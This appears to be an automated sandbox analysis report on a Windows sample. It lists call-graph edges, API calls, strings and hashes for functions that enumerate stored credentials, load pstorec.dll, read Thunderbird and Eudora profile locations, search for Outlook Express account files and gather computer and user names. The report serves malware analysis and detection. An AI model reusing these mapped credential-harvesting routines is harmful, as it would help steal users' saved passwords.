33291->33861 33294 40ae35 33295 40ae75 CloseHandle 33294->33295 33296 40ae7e SetCursor 33294->33296 33295->33296 33296->33289 33297->33294 33862 406b15 9 API calls 33297->33862 33299->33128 33300->33132 33313 40979f 33301->33313 33304 4099ed memcpy memcpy 33305 409a47 33304->33305 33305->33304 33306 409a85 ??2@YAPAXI ??2@YAPAXI 33305->33306 33310 408b27 12 API calls 33305->33310 33308 409ac1 ??2@YAPAXI 33306->33308 33309 409af8 33306->33309 33308->33309 33323 409909 33309->33323 33310->33305 33312 4023b8 33312->33213 33314 4097b1 33313->33314 33315 4097aa ??3@YAXPAX 33313->33315 33316 4097b8 ??3@YAXPAX 33314->33316 33317 4097bf 33314->33317 33315->33314 33316->33317 33318 4097c9 ??3@YAXPAX 33317->33318 33320 4097d0 33317->33320 33318->33320 33319 4097f0 ??2@YAPAXI ??2@YAPAXI 33319->33304 33320->33319 33321 4097e0 ??3@YAXPAX 33320->33321 33322 4097e9 ??3@YAXPAX 33320->33322 33321->33322 33322->33319 33324 4077e4 ??3@YAXPAX 33323->33324 33325 409912 33324->33325 33326 4077e4 ??3@YAXPAX 33325->33326 33327 40991a 33326->33327 33328 4077e4 ??3@YAXPAX 33327->33328 33329 409922 33328->33329 33330 4077e4 ??3@YAXPAX 33329->33330 33331 40992a 33330->33331 33332 4077ae 4 API calls 33331->33332 33333 40993d 33332->33333 33334 4077ae 4 API calls 33333->33334 33335 409947 33334->33335 33336 4077ae 4 API calls 33335->33336 33337 409951 33336->33337 33338 4077ae 4 API calls 33337->33338 33339 40995b 33338->33339 33339->33312 33341 41067e 2 API calls 33340->33341 33342 41073a 33341->33342 33343 41076d memset 33342->33343 33382 406e4c 33342->33382 33348 41078d 33343->33348 33347 401e95 strlen strlen 33347->33216 33347->33217 33385 410411 RegOpenKeyExA 33348->33385 33349 4107ba 33350 4107ef _mbscpy 33349->33350 33386 4106ad _mbscpy 33349->33386 33350->33347 33352 4107cb 33387 410452 RegQueryValueExA 33352->33387 33354 4107e3 RegCloseKey 33354->33350 33355->33220 33356->33226 33388 410411 RegOpenKeyExA 33357->33388 33359 401c4b 33360 401cac 33359->33360 33389 410452 RegQueryValueExA 33359->33389 33360->33230 33360->33232 33362 401c69 33363 401c70 strchr 33362->33363 33364 401ca3 RegCloseKey 33362->33364 33363->33364 33365 401c84 strchr 33363->33365 33364->33360 33365->33364 33366 401c93 33365->33366 33390 406ca4 strlen 33366->33390 33368 401ca0 33368->33364 33369->33231 33370->33217 33371->33222 33372->33249 33393 410411 RegOpenKeyExA 33373->33393 33375 4104a9 33376 4104d2 33375->33376 33394 410452 RegQueryValueExA 33375->33394 33376->33249 33378 4104c1 RegCloseKey 33378->33376 33380->33249 33381->33236 33383 406e5b GetVersionExA 33382->33383 33384 406e6c 33382->33384 33383->33384 33384->33343 33384->33347 33385->33349 33386->33352 33387->33354 33388->33359 33389->33362 33391 406cb5 33390->33391 33392 406cb8 memcpy 33390->33392 33391->33392 33392->33368 33393->33375 33394->33378 33396 4098ad 33395->33396 33398 4098bb 33395->33398 33403 409669 memset SendMessageA 33396->33403 33399 409906 33398->33399 33400 4098f8 33398->33400 33399->33261 33404 4095d9 SendMessageA 33400->33404 33402->33257 33403->33398 33404->33399 33405->33264 33406->33266 33408 404780 FreeLibrary 33407->33408 33409 404736 LoadLibraryA 33408->33409 33410 404747 GetProcAddress 33409->33410 33411 404769 33409->33411 33410->33411 33412 40475f 33410->33412 33413 40477c 33411->33413 33414 404780 FreeLibrary 33411->33414 33412->33411 33413->33266 33414->33413 33416 404794 FreeLibrary 33415->33416 33417 40479e 33415->33417 33416->33417 33417->33266 33419 410166 FreeLibrary 33418->33419 33420 403c1d LoadLibraryA 33419->33420 33421 403c61 33420->33421 33422 403c31 GetProcAddress 33420->33422 33424 410166 FreeLibrary 33421->33424 33422->33421 33423 403c4b 33422->33423 33423->33421 33427 403c58 33423->33427 33425 403c68 33424->33425 33426 40472f 3 API calls 33425->33426 33428 403c73 33426->33428 33427->33425 33498 4036d7 33428->33498 33431 4036d7 26 API calls 33432 403c87 33431->33432 33433 4036d7 26 API calls 33432->33433 33434 403c91 33433->33434 33435 4036d7 26 API calls 33434->33435 33436 403c9b 33435->33436 33510 408344 33436->33510 33444 403cd2 33445 403ce4 33444->33445 33693 402bc3 39 API calls 33444->33693 33558 410411 RegOpenKeyExA 33445->33558 33448 403cf7 33449 403d09 33448->33449 33694 402bc3 39 API calls 33448->33694 33559 402c4f 33449->33559 33453 406e4c GetVersionExA 33454 403d1e 33453->33454 33577 410411 RegOpenKeyExA 33454->33577 33456 403d3e 33457 403d4e 33456->33457 33695 402b14 46 API calls 33456->33695 33578 410411 RegOpenKeyExA 33457->33578 33460 403d74 33461 403d84 33460->33461 33696 402b14 46 API calls 33460->33696 33579 410411 RegOpenKeyExA 33461->33579 33464 403daa 33465 403dba 33464->33465 33697 402b14 46 API calls 33464->33697 33580 41017d 33465->33580 33469 404780 FreeLibrary 33470 403dd5 33469->33470 33584 402fcd 33470->33584 33473 402fcd 34 API calls 33474 403ded 33473->33474 33600 4032a9 33474->33600 33483 403e28 33485 403e60 33483->33485 33486 403e33 _mbscpy 33483->33486 33647 40f478 33485->33647 33699 40eca9 303 API calls 33486->33699 33495 410171 FreeLibrary 33494->33495 33496 41017c 33494->33496 33495->33496 33496->33266 33497->33267 33499 4037b7 33498->33499 33500 4036ed 33498->33500 33499->33431 33700 4101d8 UuidFromStringA UuidFromStringA memcpy 33500->33700 33502 403700 33502->33499 33503 403708 strchr 33502->33503 33503->33499 33504 403722 33503->33504 33701 4021ad memset 33504->33701 33506 403731 _mbscpy _mbscpy strlen 33507 403796 _mbscpy 33506->33507 33508 40377b sprintf 33506->33508 33702 4023d7 16 API calls 33507->33702 33508->33507 33511 408354 33510->33511 33703 408043 11 API calls 33511->33703 33515 408372 33516 403ca7 33515->33516 33517 40837d memset 33515->33517 33528 407f93 33516->33528 33706 4104d7 RegEnumKeyExA 33517->33706 33519 408444 RegCloseKey 33519->33516 33521 4083a9 33521->33519 33522 4083ce memset 33521->33522 33707 410411 RegOpenKeyExA 33521->33707 33710 4104d7 RegEnumKeyExA 33521->33710 33708 410452 RegQueryValueExA 33522->33708 33525 408406 33709 4081fd 10 API calls 33525->33709 33527 40841d RegCloseKey 33527->33521 33711 410411 RegOpenKeyExA 33528->33711 33530 407fb5 33531 403cb3 33530->33531 33532 407fbc memset 33530->33532 33540 408458 33531->33540 33712 4104d7 RegEnumKeyExA 33532->33712 33534 408035 RegCloseKey 33534->33531 33536 407fe5 33536->33534 33713 410411 RegOpenKeyExA 33536->33713 33714 407e63 11 API calls 33536->33714 33715 4104d7 RegEnumKeyExA 33536->33715 33539 408018 RegCloseKey 33539->33536 33716 4045d6 33540->33716 33543 408660 33724 404651 33543->33724 33545 4084a5 33545->33543 33548 4084af wcslen 33545->33548 33547 4084a3 CredEnumerateW 33547->33545 33548->33543 33555 4084e2 33548->33555 33549 4084ec _wcsncoll 33549->33555 33551 40472f 3 API calls 33551->33555 33552 404780 FreeLibrary 33552->33555 33553 408584 memset 33554 4085b1 memcpy wcschr 33553->33554 33553->33555 33554->33555 33555->33543 33555->33549 33555->33551 33555->33552 33555->33553 33555->33554 33556 408634 LocalFree 33555->33556 33727 404666 _mbscpy 33555->33727 33556->33555 33557 410411 RegOpenKeyExA 33557->33444 33558->33448 33728 410411 RegOpenKeyExA 33559->33728 33561 402c6c 33562 402d97 33561->33562 33563 402c79 memset 33561->33563 33562->33453 33729 4104d7 RegEnumKeyExA 33563->33729 33565 402d8e RegCloseKey 33565->33562 33566 410493 3 API calls 33567 402cd6 memset sprintf 33566->33567 33730 410411 RegOpenKeyExA 33567->33730 33569 402d1a 33570 402d2c sprintf 33569->33570 33731 402bc3 39 API calls 33569->33731 33732 410411 RegOpenKeyExA 33570->33732 33575 402ca4 33575->33565 33575->33566 33576 402d8c 33575->33576 33733 402bc3 39 API calls 33575->33733 33734 4104d7 RegEnumKeyExA 33575->33734 33576->33565 33577->33456 33578->33460 33579->33464 33581 41018b 33580->33581 33582 410166 FreeLibrary 33581->33582 33583 403dca 33582->33583 33583->33469 33735 410411 RegOpenKeyExA 33584->33735 33586 402feb 33587 402ff8 memset 33586->33587 33588 40311e 33586->33588 33736 4104d7 RegEnumKeyExA 33587->33736 33588->33473 33590 403114 RegCloseKey 33590->33588 33591 410493 3 API calls 33592 40304a memset sprintf 33591->33592 33737 410411 RegOpenKeyExA 33592->33737 33594 403094 memset 33738 4104d7 RegEnumKeyExA 33594->33738 33596 4030eb RegCloseKey 33598 403025 33596->33598 33598->33590 33598->33591 33598->33594 33598->33596 33599 4104d7 RegEnumKeyExA 33598->33599 33739 402da5 26 API calls 33598->33739 33599->33598 33601 4032c7 33600->33601 33602 40339b 33600->33602 33740 4021ad memset 33601->33740 33615 4034d6 memset memset 33602->33615 33604 4032d3 33741 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33604->33741 33606 4032dc 33607 4032ea memset GetPrivateProfileSectionA 33606->33607 33742 4023d7 16 API calls 33606->33742 33607->33602 33609 403321 33607->33609 33609->33602 33610 40338d strlen 33609->33610 33743 4021ad memset 33609->33743 33744 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33609->33744 33745 4023d7 16 API calls 33609->33745 33610->33602 33610->33609 33612 403342 strchr 33612->33609 33616 410493 3 API calls 33615->33616 33617 403531 33616->33617 33618 403571 33617->33618 33619 403538 _mbscpy 33617->33619 33623 403977 33618->33623 33746 406af3 strlen _mbscat 33619->33746 33621 403557 _mbscat 33747 4033e2 19 API calls 33621->33747 33748 404666 _mbscpy 33623->33748 33627 40399c 33629 4039f1 33627->33629 33749 40edd5 memset memset 33627->33749 33770 40f057 33627->33770 33786 4038da 21 API calls 33627->33786 33630 404780 FreeLibrary 33629->33630 33631 4039fd 33630->33631 33632 4037bc memset memset 33631->33632 33794 443a35 memset 33632->33794 33635 4038d4 33635->33483 33698 40eca9 303 API calls 33635->33698 33637 403820 33638 406ca4 2 API calls 33637->33638 33639 403835 33638->33639 33640 406ca4 2 API calls 33639->33640 33641 403847 strchr 33640->33641 33642 403876 _mbscpy 33641->33642 33643 403889 strlen 33641->33643 33644 4038b1 _mbscpy 33642->33644 33643->33644 33645 403896 sprintf 33643->33645 33806 4023d7 16 API calls 33644->33806 33645->33644 33648 4446d0 33647->33648 33649 40f488 RegOpenKeyExA 33648->33649 33650 40f4b3 RegOpenKeyExA 33649->33650 33651 403e6c 33649->33651 33652 40f5a5 RegCloseKey 33650->33652 33653 40f4cd RegQueryValueExA 33650->33653 33661 40f2e4 33651->33661 33652->33651 33654 40f59b RegCloseKey 33653->33654 33655 40f4fc 33653->33655 33654->33652 33656 40472f 3 API calls 33655->33656 33657 40f509 33656->33657 33657->33654 33658 40f591 LocalFree 33657->33658 33659 40f555 memcpy memcpy 33657->33659 33658->33654 33811 40f177 11 API calls 33659->33811 33662 406e4c GetVersionExA 33661->33662 33663 40f305 33662->33663 33664 4045d6 7 API calls 33663->33664 33667 40f321 33664->33667 33665 404651 FreeLibrary 33666 403e72 33665->33666 33673 4437d7 memset 33666->33673 33668 40f45e 33667->33668 33669 40f38b memset WideCharToMultiByte 33667->33669 33668->33665 33669->33667 33670 40f3bb _strnicmp 33669->33670 33670->33667 33671 40f3d3 WideCharToMultiByte 33670->33671 33671->33667 33672 40f400 WideCharToMultiByte 33671->33672 33672->33667 33674 41072b 9 API calls 33673->33674 33675 443816 33674->33675 33812 40732d strlen strlen 33675->33812 33680 41072b 9 API calls 33681 44383d 33680->33681 33682 40732d 3 API calls 33681->33682 33683 443847 33682->33683 33684 4436ff 65 API calls 33683->33684 33685 443853 memset memset 33684->33685 33686 410493 3 API calls 33685->33686 33687 4438a6 ExpandEnvironmentStringsA strlen 33686->33687 33688 4438e1 _strcmpi 33687->33688 33689 4438d2 33687->33689 33690 403e7e 33688->33690 33691 4438f9 33688->33691 33689->33688 33690->33266 33692 4436ff 65 API calls 33691->33692 33692->33690 33693->33445 33694->33449 33695->33457 33696->33461 33697->33465 33698->33483 33699->33485 33700->33502 33701->33506 33702->33499 33704 40818e 33703->33704 33705 410411 RegOpenKeyExA 33704->33705 33705->33515 33706->33521 33707->33521 33708->33525 33709->33527 33710->33521 33711->33530 33712->33536 33713->33536 33714->33539 33715->33536 33717 404651 FreeLibrary 33716->33717 33718 4045de LoadLibraryA 33717->33718 33719 40464c 33718->33719 33720 4045ef GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33718->33720 33719->33543 33719->33545 33719->33547 33721 404638 33720->33721 33722 40463e 33721->33722 33723 404651 FreeLibrary 33721->33723 33722->33719 33723->33719 33725 403cbf 33724->33725 33726 404657 FreeLibrary 33724->33726 33725->33557 33726->33725 33727->33555 33728->33561 33729->33575 33730->33569 33731->33570 33732->33575 33733->33575 33734->33575 33735->33586 33736->33598 33737->33598 33738->33598 33739->33598 33740->33604 33741->33606 33742->33607 33743->33612 33744->33609 33745->33609 33746->33621 33747->33618 33748->33627 33787 407649 33749->33787 33752 407649 _mbsnbcat 33753 40ef18 RegOpenKeyExA 33752->33753 33754 40ef38 RegQueryValueExA 33753->33754 33755 40f04e 33753->33755 33756 40f045 RegCloseKey 33754->33756 33757 40ef65 33754->33757 33755->33627 33756->33755 33757->33756 33766 40efea 33757->33766 33791 404666 _mbscpy 33757->33791 33759 40ef86 33761 40472f 3 API calls 33759->33761 33767 40ef8b 33761->33767 33762 40f013 RegQueryValueExA 33762->33756 33763 40f036 33762->33763 33763->33756 33764 40efdf 33765 404780 FreeLibrary 33764->33765 33765->33766 33766->33756 33792 4012ee strlen 33766->33792 33767->33764 33768 40efd6 LocalFree 33767->33768 33769 40efba memcpy 33767->33769 33768->33764 33769->33768 33793 404666 _mbscpy 33770->33793 33772 40f06f 33773 4045d6 7 API calls 33772->33773 33774 40f07d 33773->33774 33775 40f157 33774->33775 33776 40472f 3 API calls 33774->33776 33777 404651 FreeLibrary 33775->33777 33781 40f08a 33776->33781 33778 40f166 33777->33778 33779 404780 FreeLibrary 33778->33779 33780 40f171 33779->33780 33780->33627 33781->33775 33782 40f10c WideCharToMultiByte 33781->33782 33783 40f12d strlen 33782->33783 33784 40f14e LocalFree 33782->33784 33783->33784 33785 40f13d _mbscpy 33783->33785 33784->33775 33785->33784 33786->33627 33788 407675 33787->33788 33789 407656 _mbsnbcat 33788->33789 33790 407679 33788->33790 33789->33788 33790->33752 33791->33759 33792->33762 33793->33772 33807 410411 RegOpenKeyExA 33794->33807 33796 443a6f 33797 40380c 33796->33797 33808 410452 RegQueryValueExA 33796->33808 33797->33635 33805 4021ad memset 33797->33805 33799 443a88 33800 443ac0 RegCloseKey 33799->33800 33809 410452 RegQueryValueExA 33799->33809 33800->33797 33802 443aa5 33802->33800 33810 443d5d 30 API calls 33802->33810 33804 443abe 33804->33800 33805->33637 33806->33635 33807->33796 33808->33799 33809->33802 33810->33804 33811->33658 33813 407358 33812->33813 33814 40734a _mbscat 33812->33814 33815 4436ff 33813->33815 33814->33813 33832 407c2c 33815->33832 33818 44373a 33819 443761 33818->33819 33820 443745 33818->33820 33840 407c87 33818->33840 33821 407c2c 9 API calls 33819->33821 33853 443683 52 API calls 33820->33853 33829 44378d 33821->33829 33823 407c87 9 API calls 33823->33829 33824 4437bb 33850 407d1f 33824->33850 33828 407d1f FindClose 33830 4437d1 33828->33830 33829->33823 33829->33824 33831 4436ff 65 API calls 33829->33831 33854 407bf1 strcmp strcmp 33829->33854 33830->33680 33831->33829 33833 407d1f FindClose 33832->33833 33834 407c39 33833->33834 33835 406ca4 2 API calls 33834->33835 33836 407c4c strlen strlen 33835->33836 33837 407c70 33836->33837 33838 407c79 33836->33838 33855 406e81 strlen _mbscat _mbscpy _mbscat 33837->33855 33838->33818 33841 407c92 FindFirstFileA 33840->33841 33842 407cb3 FindNextFileA 33840->33842 33845 407cce 33841->33845 33843 407cd5 strlen strlen 33842->33843 33844 407cc9 33842->33844 33847 407d0e 33843->33847 33848 407d05 33843->33848 33846 407d1f FindClose 33844->33846 33845->33843 33845->33847 33846->33845 33847->33818 33856 406e81 strlen _mbscat _mbscpy _mbscat 33848->33856 33851 407d32 33850->33851 33852 407d28 FindClose 33850->33852 33851->33828 33852->33851 33853->33818 33854->33829 33855->33838 33856->33847 33857->33284 33858->33279 33859->33290 33860->33291 33861->33297 33862->33294 33863->33289 34033 426928 CloseHandle memset memset 34191 405f2b 12 API calls 34193 42df2e 127 API calls 32967 410531 32970 410344 32967->32970 32971 410351 32970->32971 32972 410398 memset GetPrivateProfileStringA 32971->32972 32973 41035f memset 32971->32973 32978 4073d5 strlen 32972->32978 32983 40735c sprintf memcpy 32973->32983 32976 410381 WritePrivateProfileStringA 32977 4103da 32976->32977 32979 4073e9 32978->32979 32981 4073eb 32978->32981 32979->32977 32980 407432 32980->32977 32981->32980 32984 40710b strtoul 32981->32984 32983->32976 32984->32981 34194 43f332 133 API calls 34196 418f35 61 API calls 34198 425e13 109 API calls 34040 411136 InterlockedCompareExchange RtlInitializeCriticalSection 34042 425e13 19 API calls 34046 440132 34 API calls 34048 4111c1 RtlInitializeCriticalSection memset 34203 4157c8 16 API calls 34205 43f3ce 138 API calls 34051 4275cd 44 API calls 34207 424852 108 API calls 34209 42dbd4 18 API calls 34054 40c5d8 18 API calls 34210 432bda 16 API calls 34211 43ebd9 22 API calls 33883 4105dd FindResourceA 33884 4105f6 SizeofResource 33883->33884 33887 410620 33883->33887 33885 410607 LoadResource 33884->33885 33884->33887 33886 410615 LockResource 33885->33886 33885->33887 33886->33887 34214 4013de 15 API calls 34217 424852 76 API calls 34058 4141e7 15 API calls 34219 43ebdd 25 API calls 34220 43efec 18 API calls 34222 443ff5 _onexit 34060 4021f6 14 API calls 34224 427bfb 36 API calls 34062 433982 16 API calls 34064 411182 InterlockedCompareExchange RtlDeleteCriticalSection 34227 412786 _endthreadex 34065 401591 8 API calls 34230 432b91 15 API calls 34231 43eb91 17 API calls 34068 410597 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34232 43ff95 20 API calls 34233 42af9d 31 API calls 34234 424852 119 API calls 34236 4143a4 18 API calls 34239 409fae 12 API calls 34073 419db5 42 API calls 34240 4167b5 memset 34241 4293b4 10 API calls 34074 40f5b8 70 API calls 34076 4375b9 22 API calls 34246 4243bd 15 API calls

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00408043 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004080A5
                                                                                                                                                                                          • memset.MSVCRT ref: 004080B9
                                                                                                                                                                                          • memset.MSVCRT ref: 004080D3
                                                                                                                                                                                          • memset.MSVCRT ref: 004080E8
                                                                                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                          • API String ID: 1832431107-3760989150
                                                                                                                                                                                          • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                          • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                          • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407C87 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 437 407cce-407cd3 433->437 435 407cd5-407d03 strlen * 2 434->435 436 407cc9 call 407d1f 434->436 440 407d12 435->440 441 407d05-407d10 call 406e81 435->441 436->437 437->435 439 407d18-407d1e 437->439 443 407d15-407d17 440->443 441->443 443->439
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CEB
                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CF3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                          • API String ID: 379999529-2881260426
                                                                                                                                                                                          • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                          • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401E60 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00401E82
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                          • memset.MSVCRT ref: 00401FA8
                                                                                                                                                                                          • atoi.MSVCRT ref: 00401FD7
                                                                                                                                                                                          • memset.MSVCRT ref: 00401FFA
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402027
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                          • memset.MSVCRT ref: 00402092
                                                                                                                                                                                          • strlen.MSVCRT ref: 00402098
                                                                                                                                                                                          • strlen.MSVCRT ref: 004020A6
                                                                                                                                                                                          • strlen.MSVCRT ref: 004020D9
                                                                                                                                                                                          • strlen.MSVCRT ref: 004020E7
                                                                                                                                                                                          • memset.MSVCRT ref: 0040200F
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040216E
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                          • API String ID: 1846531875-4223776976
                                                                                                                                                                                          • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                          • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CC66 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                            • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                            • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                            • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040CEC8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                          • API String ID: 745651260-375988210
                                                                                                                                                                                          • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                          • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403C03 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
